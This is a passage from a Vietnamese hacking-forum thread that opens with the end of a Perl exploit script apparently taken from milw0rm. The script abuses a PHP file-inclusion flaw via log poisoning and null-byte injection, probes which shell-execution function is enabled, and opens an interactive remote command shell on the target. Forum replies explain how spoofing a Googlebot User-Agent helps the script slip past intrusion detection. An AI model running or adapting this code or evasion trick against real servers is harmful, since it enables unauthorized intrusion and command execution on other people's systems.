                                $xpl = IO::Socket::INET->new(Proto => "tcp", PeerAddr => $target, PeerPort => $port) || die "[-] Failed to connect.
Exiting...\r\n";
                                print $xpl "GET /".$code." HTTP/1.1\n";
                                print $xpl "Host: $target\n";
                                print $xpl "User-Agent: Googlebot/2.1 (+http://www.google.com/bot.html)\n";
                                print $xpl "Accept: text/html\n";
                                print $xpl "Connection: close\n\n\r\n";

                                $xpl_retry = IO::Socket::INET->new(Proto => "tcp", PeerAddr => $target, PeerPort => $port) || die "[-] Failed to connect.
Exiting...\r\n";
                                print $xpl_retry "GET ".$vulnf.$path.$log."%00&cmd=dir HTTP/1.1\n";
                                print $xpl_retry "Host: $target\n";
                                print $xpl_retry "User-Agent: Googlebot/2.1 (+http://www.google.com/bot.html)\n";
                                print $xpl_retry "Accept: text/html\n";
                                print $xpl_retry "Connection: close\n\n\r\n";

                                while (<$xpl_retry>)
                                {
                                        if (/b>:  $cmdfunct\(\) has been disabled for security reasons/)
                                        {
                                                print "[-] ".$cmdfunct."() function is disabled. \n";
                                                $enabled_funct = false;
                                                last;
                                        }
                                        else
                                        {
                                                $enabled_funct = true;
                                        }
                                }

                                if ($enabled_funct eq true)
                                {
                                        print "[+] Enabled function found! [".$cmdfunct."]\n";
                                        break;
                                }
                        }
                }

                if ($enabled_funct eq false) {
                print "[-] No enabled cmd function found. Tried system(),
exec(), shell_exec(), passthru()\n"; exit(); }
        }
}

print "[!] Command execution at: http://".$target.$vulnf.$log."%00\n";
print "[+] Creating shell - Type 'exit' to quit\n";

print "[cmd]\$ ";
$cmd = <STDIN>;
$cmd =~ s/ /%20/g;

while ($cmd !~ "exit")
{
        $scmd = IO::Socket::INET->new(Proto => "tcp", PeerAddr => $target,
PeerPort => $port) || die "[-] Failed to connect. Exiting...\r\n";
        print $scmd "GET ".$vulnf.$path.$log."%00&cmd=".substr($cmd, 0, -1)."
HTTP/1.1\n";
        print $scmd "Host: $target\n";
        print $scmd "User-Agent: Googlebot/2.1
(+http://www.google.com/bot.html)\n";
        print $scmd "Accept: text/html\n";
        print $scmd "Connection: close\n\n\r\n";

        # prints output from command execution
        if ($opt eq "-p")
        {
                while (<$scmd>)
                {
                        print <$scmd>;
                }
        }

        print "[cmd]\$ ";
        $cmd = <STDIN>;
        $cmd =~ s/ /%20/g;
}


# milw0rm.com [2006-12-03]
[Up] [Print Copy]
  [Question]   Re: Xin hỏi về lỗi của Bộ GDDT 06/01/2007 22:10:50 (+0700) | #23 | 34686
[Avatar]
conmale
Administrator

Joined: 07/05/2004 23:43:15
Messages: 9353
Location: down under
Offline
[Profile] [PM]
Chà... có điểm này khá lý thú smilie) :

print $scmd "Host: $target\n";
print $scmd "User-Agent: Googlebot/2.1
(+http://www.google.com/bot.html)\n";
print $scmd "Accept: text/html\n";
print $scmd "Connection: close\n\n\r\n";


Một dạng mạo danh để qua mặt "defense system".
What bringing us together is stronger than what pulling us apart.
[Up] [Print Copy]
  [Question]   Re: Xin hỏi về lỗi của Bộ GDDT 07/01/2007 21:07:46 (+0700) | #24 | 34856
[Avatar]
pthanhkim
Member

[Minus]    0    [Plus]
Joined: 06/03/2005 20:07:28
Messages: 27
Offline
[Profile] [PM]
Nếu bạn nào muốn biết cơ bản thì vào đây xem bài của bạn mrdung Tiêu đề: Phân tích exploit PHP remote include file và cách fixed http://www.htmlforum.net/hvaonline/posts/list/501.html

conmale wrote:
Chà... có điểm này khá lý thú smilie) :

print $scmd "Host: $target\n";
print $scmd "User-Agent: Googlebot/2.1
(+http://www.google.com/bot.html)\n";
print $scmd "Accept: text/html\n";
print $scmd "Connection: close\n\n\r\n";


Một dạng mạo danh để qua mặt "defense system".  


Vâng, Nếu muốn thì sửa lại mạo danh thành Mozilla có dạng như sau :wink: :

Host: 127.0.0.1:9090
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; en; rv:1.8.1.1) Gecko/20061205 Firefox/2.0.0.1
Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Language: en,en-en;q=0.8,en-us;q=0.5,en;q=0.3
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 300
Connection: keep-alive
[Up] [Print Copy]
  [Question]   Re: Xin hỏi về lỗi của Bộ GDDT 07/01/2007 23:51:46 (+0700) | #25 | 34867
[Avatar]
xnohat
Moderator

Joined: 30/01/2005 13:59:19
Messages: 1210
Location: /dev/null
Offline
[Profile] [PM] [Email] [WWW] [Yahoo!] [MSN]
Hèm người ta fake thành GoogleBot, để làm cho IDS bỏ qua, vì GoogleBot hoạt động kỉu một con bot và cái script exploit kia cũng vậy nó cũng hoạt động như 1 bot, vậy nên việc giả GoogleBot là để thế, đằng ấy giả Mozilla FF thì cũng vô ích, vì khi đó cái script là Một normal user, lộ cái một, IDS "diệt".
iJust clear, "What I need to do and how to do it"/i
br
brBox tán gẫu dời về: http://www.facebook.com/hvaonline
[Up] [Print Copy]
  [Question]   Re: Xin hỏi về lỗi của Bộ GDDT 08/01/2007 18:15:12 (+0700) | #26 | 35006
[Avatar]
pthanhkim
Member

[Minus]    0    [Plus]
Joined: 06/03/2005 20:07:28
Messages: 27
Offline
[Profile] [PM]

hackernohat wrote:
Hèm người ta fake thành GoogleBot, để làm cho IDS bỏ qua, vì GoogleBot hoạt động kỉu một con bot và cái script exploit kia cũng vậy nó cũng hoạt động như 1 bot, vậy nên việc giả GoogleBot là để thế, đằng ấy giả Mozilla FF thì cũng vô ích, vì khi đó cái script là Một normal user, lộ cái một, IDS "diệt". 


Hi hi, ra là vậy, Kim sửa lại cho giống với Mozilla cứ nghĩ là qua mặt như dạng Browser mà không hiểu rõ ẩn ý của Google bot, cảm ơn các sư huynh đã chỉ giáo, muội muội thanks very much smilie)
xin kiss hackernohat 1 cái nha smilie)
[Up] [Print Copy]
[digg] [delicious] [google] [yahoo] [technorati] [reddit] [stumbleupon]
Go to: 
 Users currently in here 
1 Anonymous

Powered by JForum - Extended by HVAOnline
 hvaonline.net  |  hvaforum.net  |  hvazone.net  |  hvanews.net  |  vnhacker.org
1999 - 2013 © v2012|0504|218|